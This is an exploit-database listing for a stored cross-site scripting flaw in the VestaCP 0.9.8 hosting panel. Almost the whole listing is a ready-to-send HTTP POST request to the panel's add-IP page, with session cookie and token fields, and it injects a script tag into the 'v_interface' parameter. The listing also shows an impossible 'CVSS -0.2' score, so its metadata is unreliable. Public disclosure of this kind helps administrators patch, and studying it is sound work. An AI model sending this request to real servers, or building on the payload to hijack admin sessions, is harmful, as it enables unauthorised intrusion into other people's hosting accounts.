Exploit for VestaCP 0.9.8 Cross Site Scripting

Name: Exploit for VestaCP 0.9.8 Cross Site Scripting
Rating: 5 (287 reviews)

2021-03-18 | CVSS -0.2

## https://sploitus.com/exploit?id=PACKETSTORM:161850
# Title: VestaCP 0.9.8 - 'v_interface' Add IP Stored XSS  
# Date: 07.03.2021  
# Author: Numan Türle  
# Vendor Homepage: https://vestacp.com  
# Software Link: https://myvestacp.com < 0.9.8-26-43  
# Software Link: https://vestacp.com < 0.9.8-26  
# Tested on: VestaCP  
  
POST /add/ip/ HTTP/1.1  
Host: TARGET:8083  
Connection: close  
Content-Length: 165  
Cache-Control: max-age=0  
Origin: https://TARGET:8083  
Content-Type: application/x-www-form-urlencoded  
User-Agent: USER-AGENT  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: https://TARGET:8083/add/ip/  
Accept-Encoding: gzip, deflate  
Accept-Language: en,tr-TR;  
Cookie: PHPSESSID=udiudv2k0707d6k3p3fi1n1qk0  
sec-gpc: 1  
  
token=04331c937aeb2d203889b3fb86fa75b2&ok=Add&v_ip=90.7.3.1&v_netmask=255.0.0.0&v_interface=<script>alert(1)</script>&v_shared=on&v_owner=admin&v_name=&v_nat=&ok=Add